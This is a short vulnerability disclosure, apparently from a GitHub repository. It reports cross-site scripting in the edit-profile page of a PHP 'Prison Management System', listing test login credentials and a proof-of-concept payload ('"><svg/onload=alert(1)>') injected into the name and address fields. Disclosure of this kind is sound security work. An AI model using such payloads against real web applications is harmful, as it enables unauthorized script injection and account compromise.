Skip to content

Latest commit

 

History

History
63 lines (40 loc) · 1.3 KB

XSS.md

File metadata and controls

63 lines (40 loc) · 1.3 KB

Prison Management System

XSS on /Employee/edit-profile.php

Vendor Homepage:

https://www.sourcecodester.com/sql/17287/prison-management-system.html

Version:

V1.0

Tested on:

PHP, Apache, MySQL

Credentials:

http://localhost/prison/Account/login.php
password:- escobar2012
Email :- releaseme@gmail.com

Affected Page:

/Employee/edit-profile.php

The parameter txtfullname and txtaddress are being echoed directly into the HTML without proper sanitization or validation. This allows an attacker to inject arbitrary JavaScript code into the page, leading to XSS attacks.

# Employee/edit-profile.php
<input type="text" size="77" name="txtaddress" value=""><svg/onload=alert(1)>" class="form-control">
<input type="text" size="77" name="txtfullname" value=""><svg/onload=alert(1)>" class="form-control" required="">

Proof of Concept:

Payload:

"><svg/onload=alert(1)>

Screenshot

1

4

3

2